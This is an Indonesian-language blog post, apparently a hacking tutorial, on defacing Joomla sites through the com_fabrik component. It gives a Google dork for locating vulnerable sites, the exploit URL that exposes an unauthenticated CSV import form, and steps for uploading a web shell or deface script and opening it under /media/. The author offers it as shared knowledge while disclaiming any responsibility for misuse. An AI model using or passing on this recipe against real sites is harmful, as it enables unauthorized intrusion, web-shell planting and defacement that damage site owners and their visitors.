Cara Deface Menggunakan Exploit Com_Fabrik


Kali ini gue mau share tutorial deface pake exploit Com_Fabrik. Ini exploit gak dulu-dulu banget sih, cuma akhir-akhir ini kok rame yang main.
Bug ini ada pada CMS Joomla. "CMS Joomla banyak bugnya ya aowkoakwoka", gak juga. WP juga banyak bugnya cok. Ok langsung ae lah, ini poc gak ribet-ribet amat.

Dork :
inurl:viewTable?cid=

Exploit : 
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Langsung ae :

1. Dorking biasa di google ea.. Pas webnya dibuka bakal ada tulisan "Sorry this form is not publish".




2. Start Exploiting! Di belakang url sitenya tambahin exploit itu. Contoh : site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 . Ntar bakal muncul form upload.



3. Pilih shell/script deface lu, terus klik "Import CSV" buat upload. Kalo sukses bakal muncul kayak di gambar (yang gue kotakin).



4. Buat akses file/shell yang tadi lu upload di site.com/media/namafile.php . Karena ini site gak bisa upload shell jadi gue akses script deface yang gue upload ea.



Dah gitu doang, gampang ea. Inget ini ya tod, dosa tanggung sendiri. Gue cuma share ilmu doang, kalo disalahgunain ini bukan urusan gue y kimak.

Next
This is the current newest page
Previous
Next Post »
Thanks for your comment